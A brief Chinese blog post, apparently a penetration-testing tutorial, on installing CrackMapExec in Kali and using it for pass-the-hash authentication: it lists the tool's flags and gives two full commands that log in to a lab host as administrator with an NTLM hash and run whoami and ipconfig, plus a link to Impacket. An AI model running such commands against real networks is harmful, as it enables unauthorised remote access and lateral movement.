Crackmapexec

2021年12月21日

kali下进行安装

apt-get install crackmapexec

IP:可以是单个ip或者ip段

-u:指定用户

-H:指定NTLM Hash

-d:指定域

-x:执行系统命令

crackmapexec smb 192.168.30.128 -u administrator -H f1de694efa543bb780da59c049541ea3 -d workgroup.cool -x whoami
crackmapexec smb 192.168.30.128 -u administrator -H f1de694efa543bb780da59c049541ea3 -d workgroup.cool -x ipconfig

impackt  tools 

https://github.com/SecureAuthCorp/impacket


分类:技术文章 | 标签: windows渗透内网渗透神器kali | 查看:1056
Windows域信息收集提权命令Linux主机信息收集

发表评论: